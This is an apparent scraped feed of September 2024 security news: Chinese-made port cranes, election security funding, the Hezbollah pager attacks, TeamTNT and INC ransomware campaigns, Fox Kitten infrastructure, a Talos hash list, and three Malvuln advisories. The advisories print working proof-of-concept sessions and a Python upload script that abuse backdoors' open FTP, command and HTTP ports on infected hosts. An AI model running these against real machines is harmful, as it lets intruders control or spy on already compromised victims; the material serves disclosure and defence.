US ports rely on cranes manufactured by a Chinese state-owned company, many with unmonitored cellular connections, causing cybersecurity concerns.

Source: GreenOak via Shutterstock

As the United States looks to shore up the cyber-resilience of its critical infrastructure, a congressional report has highlighted that the nation's maritime shipping and port operations rely too much on Chinese-made cranes and other systems whose software is often vulnerable and can be communicated with remotely.

Last week, the House of Representatives' Select Committee on the Chinese Communist Party released a report on the potential threats to the US port infrastructure, revealing that 80% of the ship-to-shore (STS) cranes at US ports are manufactured by a single Chinese government-owned company, Shanghai Zhenhua Heavy Industries (ZPMC). While the committee did not turn up evidence that the company used its access maliciously, the firm failed to address software vulnerabilities and retained the ability to remotely access the crane's systems via a cellular modem, often without explicit notification.

Even though the report does not find a smoking gun, the concerns are reasonable, says John Terrill, chief information security officer (CISO) at extended Internet-of-Things (IoT) security firm Phosphorus Cybersecurity.

"There could be legitimate purposes for \[a cellular modem\], but I think the general sentiment — because it's a Chinese-owned company — the \[committee\] is concerned that allowing access is setting up a ticking time bomb," he says. "If something happens geopolitically, the ports may, all of a sudden, not be able to operate the cranes."

Related:Name That Toon: Tug of War

The supply chains for critical economic sectors are attracting intense scrutiny from policymakers and security organizations. When Russia invaded Ukraine, the military targeted cyberattacks at infrastructure, such as satellite communications and nuclear power generation. The recent attacks on Lebanon-based Hezbollah militants — considered a terrorist organization by the US government — using pagers likely compromised through a supply-chain attack by Israel demonstrated the potential of cyber-physical attacks.

**Sea Change in Supply-Chain Focus**

Port facilities are often overlooked, but critically important, especially as drivers of the economy. US port facilities handle about 40% of the value of all international freight, with the top 12 ports processing about 47 million twenty-foot equivalent units (TEUs) of cargo in 2023. Cyber-physical attacks on such facilities could significantly disrupt the US economy. Cybersecurity experts have already warned that China-linked cyber-espionage groups are compromising critical infrastructure systems at facilities — such as ports — in preparation for future conflicts.

Related:SCADA Market Is Set to Reach $18.7B by 2031

The long-term risks outweigh the short-term gains of purchasing inexpensive port equipment, the House Select Committee stated in its report.

"The evidence gathered during our joint investigation indicates that ZPMC could, if desired, serve as a Trojan horse capable of helping the CCP and the PRC military exploit and manipulate US maritime equipment and technology at their request," the lawmakers stated. "This vulnerability in our critical infrastructure has the potential to affect Americans from coast to coast."

While historically overlooked, maritime supply-chain security and cybersecurity has become an increasing issue. In February, the US Department of Transportation warned that port facilities' over-reliance on Chinese vendors allowed China's government to collect information on trade and could lead to potential compromises if Sino-American relations worsen.

**Rough Seas for Cybersecurity**

Attacks on ports and ships are not unheard of. In February, the US reportedly hacked an Iranian military ship aiding Houthi rebels in the Red Sea and disrupting communications. An Indian nation-state cyber-operations group attacked maritime facilities and ports around in the Indian Ocean and as far away as the Mediterranean Sea. And spoofing of GPS signals have enabled rogue nations to cause problems for freighters and other shipping near their shores.

Related:Remote Access Sprawl Strains Industrial OT Network Security

Because so much of the infrastructure has integrated communications connected to software controlling physical equipment, cybersecurity is a significant issue, says Ron Fabela, strategic advisor to ICS/OT security firm Xona.

"Everything is remotely accessible now," he says. "If you haven't been in the industry, you might think our super-critical stuff isn't accessible from the Internet, surely, right? And oftentimes, that is not the case."

Port operators are looking to buy inexpensive port equipment, such as cranes, but then rely on the manufacturer to provide service, which leads to remote communications and data collection. In addition, numerous vulnerabilities have been found in ZPMC equipment, but bug reports disappear and are never publicized, and likely never fixed. Given China's law that forces disclosure of vulnerabilities to the government, it's likely that those vulnerabilities are being used or are being stockpiled for use, says Phosphorus' Terrill.

"A known vulnerability that is not patched is a backdoor by any other definition," he says.

**Protecting Untrusted Infrastructure**

The House CCP Committee's report recommends that the Department of Homeland Security and US Coast Guard make recommendations to disable the cellular modems in the ZPMC cranes, install technology to monitor and ensure the security of the cranes during operation, and focus extra security measures on critical ports, such as the seaport in Guam — a resupply point for the US military in the Pacific Ocean — and those designated by the Department of Defense as critical.

Port operators, however, may push back on mandates to disable the cellular devices. Turning off the cellular modems will likely mean hobbling the maintenance of the cranes and other equipment, says Xona's Fabela.

"In critical infrastructure, what I've seen is the asset owner — the purchaser of this equipment — doesn't want to maintain it," he says. "They want to have someone on the hook, if something goes wrong ... they want to ensure that the OEM or the manufacturer is the one supporting it, and being that a lot of our heavy industry is still being manufactured outside of our borders, it becomes a difficult problem."

Instead, operators should treat digital access like physical access, he says. Any session should be tightly controlled and scheduled, keeping devices offline at all other times.

"We'll monitor, and we'll over-the-shoulder their access — this is how they do it with physical access," he says. "A vendor can't just walk into a port and walk around. You have to have a reason to be there, usually a job order; you have to have a background check; and someone will escort you. So just extending those best practices to the cyber domain is often all that's needed."

In the long term, the House CCP Committee's report recommends that the US Department of Commerce study whether building cranes is the United States is feasible, as well as ways to improve US manufacturing competitiveness.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Concerns Over Supply Chain Attacks on US Seaports Grow

This year, Congress only allocated $55 million in federal grant dollars to states for security and other election improvements.

Thursday, September 19, 2024 14:00

Last week, six Secretaries of State testified to U.S. Congress about the current state of election security ahead of November’s Presidential election. 

Some of the same topics came up as usual — disinformation campaigns, influence from foreign actors, and the physical protection of poll workers on election day. 

It’s good that these conversations are continuing after the various revelations that came out after the 2016 presidential election, and election security is an issue globally, especially this year when there are major elections taking place in hundreds of countries.  

As with many things in politics and life, though, there is still an issue of money. 

Talk of the importance of election security is positive, but at the end of the day, states and municipalities will need monetary and human resources to implement the appropriate defenses and protect everything from voting machines to online vote-tallying systems and social media disinformation campaigns.  

Arizona Secretary of State Adrian Fontes used his time in front of Congress to ask for additional funding, because his state has been unable to execute all their election security goals.  

“None of this is free and none of it is cheap,” he said. “Our operations, administration and security depend on intermittent, rare and never enough funding for the Help America Vote Act grants that we are occasionally given by Congress.” 

Additional federal funds became available for U.S. elections in 2017 after the Department of Homeland Security deemed election systems to be critical infrastructure. But this year, Congress only allocated $55 million in federal grant dollars to states for security and other improvements to elections. For comparison’s sake, presidential and Congressional candidates in the U.S. spent $14 billion on their election campaigns, more than double the amount from 2016. 

At the time, Republican lawmakers in the House voted to totally zero out the fund for the Help America Vote Act, or HAVA, grants, which have existed since 2002. 

One lobbyist even told the Stateline outlet earlier this year that many states were trying to stretch the money they do get from the HAVA program across multiple years for fear of a lack of funding in the coming election cycles.  

JP Martin, deputy communications director for the Arizona secretary of state, said in that same article that Arizona (a crucial swing state in most presidential elections) has had to put a hiring freeze in place because a lack of federal funding. 

So, talk, awareness and planning to secure elections are all positive things. But at the end of the day, all these technologies and solutions, and the people that provide them, cost money. 

**The one big thing **

Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks. Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API. 

**Why do I care? **

AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space. TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine. Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution. 

**So now what? **

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Experts and governments are still unpacking a wave of pager and handheld radio explosions in the Middle East.** The attacks appeared to target members of the armed group Hezbollah in Lebanon when hundreds of devices exploded simultaneously on Tuesday, killing multiple people. The international community has been left wondering if this was some type of cyber attack or intentional physical implants in the devices. Messages sent at the time of the attack appeared to come from Hezbollah leadership but instead triggered the explosions. Most analysts are assuming that this was a hardware supply chain attack, in which the pagers were tampered with somehow during manufacturing or while they were in transit. Supply chain attacks are normally carried out at the software level. So far, no one has taken credit for the attacks, though Hezbollah is blaming Israel, one of its chief antagonists. (Reuters, BBC) 

**Ransomware gangs are increasingly leveraging Microsoft Azure to steal victims’ information and store it.** New research findings indicate that groups like BianLian and Rhysida use Microsoft's Azure Storage Explorer and AzCopy to steal data from infiltrated networks, then store it in Azure Blob storage until it can be transferred to an attacker-controlled network. Because Azure is a popular and trusted service, corporate firewalls and security tools are unlikely to block it, making the data transfers more likely to pass undetected. Potential targets that use Azure are recommended to log out of the application after each use to prevent attackers from using the active session for file theft. (Bleeping Computer, modePUSH) 

**Health care facilities and medical devices continue to be top targets for ransomware actors, and industry leaders are calling on the U.S. federal government to do more to assist them.** This year, several massive health care providers across the globe have been affected by cyber attacks, forcing countless surgeries and appointments to be rescheduled and putting sensitive medical records at risk. Past victims include Change Healthcare, Kaiser Permanente and Ascension. One health care executive told NPR that their company was still trying to calculate the financial impact of the Change attack, which paused payments from insurance for months. They are only just now being paid out for services rendered in July. U.S. Sen. Ron Wyden, the chair of the Senate Finance Committee, recently publicly called on the Health and Human Services Department to revise its current approach to cybersecurity, because the current system “is woefully inadequate and has left the health care system vulnerable to criminals and foreign government hackers.” Other experts have said that HHS has traditionally focused on physical disasters like earthquakes, storms and power outages, and not enough on cyberspace. (NPR, Security Intelligence) 

**Can’t get enough Talos? **

*   Despite Russia warnings, Western critical infrastructure remains unprepared 
*   The Cybersecurity Cat-And-Mouse Game 
*   DragonRank Manipulates SEO Rankings To Direct Users To Malicious Sites 

**Upcoming events where you can find Talos**

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd  

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 70ff63cd695033f624a456a5c8511ce8312cffd8ac40492ffe5dc7ae18548668   
**MD5:** 49d35332a1c6fefae1d31a581a66ab46   
**Typical Filename:** 49d35332a1c6fefae1d31a581a66ab46.virus   
**Claimed Product:** N/A     
**Detection Name:** W32.Auto:70ff63.in03.Talos 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos

Talk of election security is good, but we still need more money to solve the problem

Thousands of beepers and two-way radios exploded in attacks against Hezbollah, but mainstream consumer devices like smartphones aren’t likely to be weaponized the same way.

For two days this week, Hezbollah has been rocked by a series of small explosions across Lebanon, injuring thousands and killing at least 25. But these attacks haven’t come from rockets or drones. Instead, they’ve resulted from boobytrapped electronics—including pagers, walkie-talkies, and even, reportedly, solar equipment—detonating in coordinated waves. As details come into view of the elaborate supply chain attack that compromised these devices, citizens on the ground in Lebanon and people around the world are questioning whether such attacks could target any device in your pocket.

The campaign to compromise key Hezbollah communication infrastructure with explosives was clearly elaborate and involved. The operation, which is widely believed to have been perpetrated by Israel, goes far beyond past examples of hardware supply chain attacks and may be a source of inspiration for future spycraft around the world. But sources tell WIRED that the specific scale and scope of the effort would not be easily replicated in other contexts. And, more broadly, the resources and precision involved in carrying out such an attack would be prohibitively difficult to maintain over time for key consumer devices like smartphones—which are used so widely and regularly scrutinized by researchers, product testers, and repair technicians.

“I do think there is absolutely potential to see more of this in the longer term, not targeting civilians, but generally targeting other military actors,” says Zachary Kallenborn, an adjunct nonresident fellow with the Center for Strategic and International Studies. Kallenborn says militaries are increasingly relying on commercial technology—from drones to communications devices—all of which could be compromised if supply chains can be exploited by adversaries. “These systems are being sourced from all over the globe,” he says. “What that means, then, is that you also have these global supply chains supporting them.”

While full details of the attacks are still coming to light, the devices that detonated were seemingly compromised with explosives before they arrived in Hezbollah members’ hands. Alan Woodward, a cybersecurity professor at the University of Surrey, says he suspects that an attacker would plant explosives in a device during the manufacturing process, rather than intercepting gadgets after they are finished and then taking them apart to plant explosives. Reporting by the New York Times on Wednesday evening seemed to confirm this theory, indicating that Israel directly manufactured the compromised devices via shell companies. Israel has not commented on any of the attacks.

Early theories that cyberattacks caused device batteries to overheat and explode have been ruled out by cybersecurity experts. The force of the blasts seen in on-the-ground footage would not be consistent with battery fires or explosions, especially given the small size of pager and walkie-talkie batteries.

Lebanon’s political landscape and ongoing economic crisis, coupled with regional fighting between Hezbollah and Israel, created specific opportunities for sabotage. Hezbollah is isolated globally, with countries like the United States and United Kingdom classifying it as a terrorist organization while other countries, such as Russia and China, maintain relations. This impacts Hezbollah’s avenues for importing equipment and vetting suppliers.

Amid ongoing violent conflict with Israel, Hezbollah’s digital communications and activities are also under constant barrage from Israeli hackers. In fact, this constant digital assault reportedly played a role in pushing Hezbollah away from smartphone communication and toward pagers and walkie-talkies in the first place. “Your phone is their agent,” Hezbollah leader Hassan Nasrallah said in February, referring to Israel.

The commercial spyware industry has shown it is possible to fully compromise target smartphones by exploiting chains of vulnerabilities in their mobile operating systems. Developing spyware and repeatedly finding new operating system vulnerabilities as older ones are patched is a resource-intensive process, but it is still less complicated and risky than conducting a hardware supply chain attack to physically compromise devices during or shortly after manufacturing. And for an attacker, monitoring a target’s entire digital life on a smartphone or laptop is likely more valuable than the device’s potential as a bomb.

“I’d hazard a guess that the only reason we aren’t hearing about exploding laptops is that they’re collecting too much intelligence from those,” says Jake Williams, vice president of research and development at Hunter Strategy, who formerly worked for the US National Security Agency. “I think there’s also potentially an element of targeting, too. The pagers and personal radios could pretty reliably be expected to stay in the hands of Hezbollah operatives, but more general purpose electronics like laptops could not.”

There are other more practical reasons, too, that the attacks in Lebanon are unlikely to portend a global wave of exploding consumer electronics anytime soon. Unlike portable devices that were originally designed in the 20th century, the current generation of laptops and particularly smartphones are densely packed with hardware components to offer the most features and the longest battery life in the most efficient package possible.

University of Surrey’s Woodward, who regularly takes apart consumer devices, points out that within modern smartphones there is very limited space to insert anything extra, and the manufacturing process can involve robots precisely placing components on top of each other. X-rays show how tightly packed modern phones are.

“When you open up a smartphone, I think the only way to get any sort of meaningful amount of high explosive in there would be to do something like replace one of the components,” he says, such as modifying a battery to be half battery, half explosives. But “replacing a component in a smartphone would compromise its functionality,” he says, which could lead a user to investigate the malfunction.

In contrast, the model of pager linked to the explosions—a “rugged” device with 85 days of battery life—included multiple replaceable parts. Ang Cui, founder of the embedded device security firm Red Balloon Security, examined the schematics of the pager model apparently used in the attacks and told WIRED that there would be free space inside to plant explosives. The walkie-talkies that exploded, according to the manufacturer, were discontinued a decade ago. Woodward says that when opening up redesigned, current versions of older technologies, such as pagers, many internal electronic components have been “compressed” down as manufacturing methods and processor efficiency have improved.

Smartphone production lines also operate under stricter security measures, especially for high-cost devices like Apple’s iPhones and Google’s flagship Pixel phones. This is partly to guarantee production quality, but also to ensure that employees don’t leak trade secrets or prototypes. Not all low-end Android phones are manufactured with such intense oversight, but it would be more difficult to secretly take over manufacturing of a smartphone than a forgotten pager model. In countries like China, where many devices are manufactured, there is always the possibility of a domestic operation to plant backdoors, but such a scheme would need to be elaborate to skirt international scrutiny of the devices

To find exploding cell phones, you have to go back to 20th century tech. In 1996, Palestinian bombmaker Yahya Ayyash was killed when his mobile phone exploded as he answered a call. His old-style phone—which the New York Times said was ”reportedly a small, slim model that fits in a pocket”—had 50 grams of explosives planted inside it, likely by Israel’s security services. The explosion was reportedly triggered by a radio signal emitted from a plane flying above. And unlike the pager and walkie-talkie attacks this week, Ayyash’s phone was part of a highly targeted attack on him alone.

Even if this week’s exploding device campaign doesn’t have immediate implications for every smartphone in every pocket, though, it expands enormously the specter of hardware supply chain attacks.

“I think that every shady organization worldwide will now be checking their new devices—especially those ordered in bulk from the manufacturer—for explosives,” says a longtime hardware hacker and tech procurement specialist who asked to be identified as Null Pointer. “This hit so hard because it was novel and no one in that community knew to look for it. It's ingenious.”

Your Phone Won’t Be the Next Exploding Pager

The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.
"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le

Cryptojacking / Cloud Security

The cryptojacking operation known as **TeamTNT** has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.

"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le Phuong said in a Wednesday report.

The malicious script, the Singaporean cybersecurity company noted, is responsible for disabling security features, deleting logs, terminating cryptocurrency mining processes, and inhibiting recovery efforts.

The attack chains ultimately pave the way for the deployment of the Diamorphine rootkit to conceal malicious processes, while also setting up persistent remote access to the compromised host.

The campaign has been attributed to TeamTNT with moderate confidence, citing similarities in the tactics, techniques, and procedures (TTPs) observed.

TeamTNT was first discovered in the wild in 2019, undertaking illicit cryptocurrency mining activities by infiltrating cloud and container environments. While the threat actor bid farewell in November 2021 by announcing a "clean quit," public reporting has uncovered several campaigns undertaken by the hacking crew since September 2022.

The latest activity linked to the group manifests in the form of a shell script that first checks if it was previously infected by other cryptojacking operations, after which it precedes to impair device security by disabling SELinux, AppArmor, and the firewall.

Changes implemented on ssh service

"The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service," the researchers said. "If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service."

Besides killing all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, terminate containerized processes, and remove images deployed in connection with any coin miners.

Furthermore, it establishes persistence by configuring cron jobs that download the shell script every 30 minutes from a remote server (65.108.48\[.\]150) and modifying the "/root/.ssh/authorized\_keys" file to add a backdoor account.

"It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities," the researchers noted. "The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.

The tech giant's threat intelligence team is tracking the activity under the name **Vanilla Tempest** (formerly DEV-0832).

"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.

In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.

The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.

It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.

The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.

"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector

Censys uncovers the hidden infrastructure of Fox Kitten, an Iranian cyberespionage group. It reveals unique patterns, potential new…

Censys uncovers the hidden infrastructure of Fox Kitten, an Iranian cyberespionage group. It reveals unique patterns, potential new IOCs, and actionable recommendations to protect your organization from Fox Kitten attacks.

Censys, a threat hunting and attack surface management platform has released new details regarding the infrastructure of the Iranian cyberespionage group called Fox Kitten using data from a joint Cybersecurity Advisory (CSA) by the FBI, CISA, and DC3. Censys identified a significant number of additional hosts that likely belong to the Fox Kitten infrastructure, expanding the scope of the threat.

In its report, shared with Hackread.com ahead of its publication on Wednesday, Censys illuminated the unique patterns and potentially new indicators of compromise used by Fox Kitten, which is known for targeting organizations worldwide.

Using these patterns, Censys could find previously undiscovered active hosts that boasted matching patterns and Autonomous Systems (ASs) such as Hosts D, E, and G, which could be part of the same infrastructure and may be used in future attacks. Matching domain IOCs were used to identify Host G, and matching ASs were used to identify Hosts J & C.

The data was analyzed using techniques like Host Profiling, Pattern Recognition, Link Analysis, and Historical Analysis. Host profiling involves analyzing individual hosts’ characteristics, pattern recognition identifies recurring patterns, link analysis examines relationships between infrastructure elements, and historical analysis compares current data with historical records to identify trends.

Further probing revealed that the attackers used various techniques to obfuscate their infrastructure, such as using dynamic IP addresses, distributing infrastructure across multiple Autonomous Systems (ASNs), and using misleading certificate names to disguise malicious activity.

Censys found two domain IOCs (api.gupdate.net and githubapp.net) on active IPs not listed in the CSA. Some domain IOCs were found on Fox Kitten IPs before or after the CSA timeframe. All domain IOCs were found in 64 valid certificates, requiring further monitoring.

Further research revealed commonalities such as geolocation in London, Stockholm, Frankfurt, Tel Aviv, and Los Angeles, shared Autonomous Systems (AS) numbers, unique patterns in Hosts D, E, and G, timeframe discrepancies on some hosts outside the CSA timeframe, and 38,862 additional potentially malicious hosts with similar characteristics. These findings suggest a honeypot-like design and a potential connection between the hosts.

By delving deeper into the Fox Kitten infrastructure, Censys has provided valuable insights into the group’s operations and tactics. These patterns and commonalities can be used to identify other active hosts and certificates that may be part of the same Fox Kitten infrastructure.

Defenders can use IOCs and known periods of nefarious activity to study host and certificate profiles before, during, and after reported attacks, conduct dynamic searches across public scan datasets like Censys to observe how threats may set up new infrastructure, and stay ahead of threat actors.

1.  **Iranian State Hackers Partner Up for Large-Scale Attacks, Report**
2.  **Iran’s MuddyWater Hits Saudis and Israelis with BugSleep Backdoor**
3.  **Iranian Hackers Team Up with Ransomware Gangs in Attacks on US**
4.  **Iran’s Peach Sandstorm Deploy FalseFont Backdoor in Defense Sector**
5.  **Iran’s Mint Sandstorm APT Hits Universities with Hamas-Israel Phishing**

Censys Uncovers Hidden Infrastructure of Iranian Fox Kitten Group

Backdoor.Win32.CCInvader.10 malware suffers from a bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/cb86af8daa35f6977c80814ec6e40d63.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.CCInvader.10Vulnerability: Authentication BypassDescription: The malware runs an FTP server.  Third-party adversarys who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.Family: CCInvaderType: PE32MD5: cb86af8daa35f6977c80814ec6e40d63SHA256: 8420788f3a575cade5f579bcbf56bb67566bca27c2b9d11dbbafffadef491f31Vuln ID: MVID-2024-0694Disclosure: 09/17/2024Exploit/PoC:ncat64.exe 192.168.18.125 21220 ICS FTP Server readyUSER gg331 Password required for ggPASS gg230 User gg logged in.SYST215 UNIX Type: L8 Internet Component Suite250 CWD command successful. "C:/" is current directory.PWD257 "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,243,249).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=62457   #243 x 256 + 249DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.CCInvader.10 MVID-2024-0694 Authentication Bypass

Backdoor.Win32.BlackAngel.13 malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/d1523df44da5fd40df92602b8ded59c8.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BlackAngel.13Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1850. Third party adversaries who can reach an infected host can issue commands made available by the backdoor. Example, send messages to victim "!msg", open launch the browser and open webpages "!url" etc.Family: BlackAngelType: PE32MD5: d1523df44da5fd40df92602b8ded59c8SHA256: 8a6e876f7452ae0a11342b852c70771a7f80b87c2e451656aaebb18b350c4b27Vuln ID: MVID-2024-0695Disclosure: 09/17/2024Exploit/PoC:nc64.exe x.x.x.x 1850Connected to host (DESKTOP-3C4IQJO)                                                                                                                                                                                                              !msg GG Forever!!msg Greetz Edu_Braun_0day, Indoushka, Dirty0tis!url https://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt!quit[commands list]!msg!opencd!closecd!exitwin!reboot!logoff!getdrive!gettree!getfile!putfile!ren!del!swap!noswap!mdisable!kdisable!url!bck!sound!txt!dos!beep!nobeep!quit!hangDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.BlackAngel.13 MVID-2024-0695 Code Execution

Backdoor.Win32.Delf.yj malware suffers from an information leakage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f991c25f1f601cc8d14dca4737415238.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Delf.yjVulnerability: Information DisclosureDescription: The malware listens on TCP port 8080. Third-party adversaries who can reach an infected system, can  download screen captures of a victims machine by making a simple HTTP GET request.Family: DelfType: PE32MD5: f991c25f1f601cc8d14dca4737415238SHA256: 512af3cc193e9cb7f0b6204889bc457affded79aa62c41ab20a74625e4279caaVuln ID: MVID-2024-0693Dropped files: dxdiag.scrDisclosure: 09/17/2024Exploit/PoC:curl 192.168.18.125:8080  --output victim.jpg  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  106k  100  106k    0     0   338k      0 --:--:-- --:--:-- --:--:--  341kDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Delf.yj MVID-2024-0693 Information Disclosure

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.
The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is

Cyber Espionage / Malware

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.

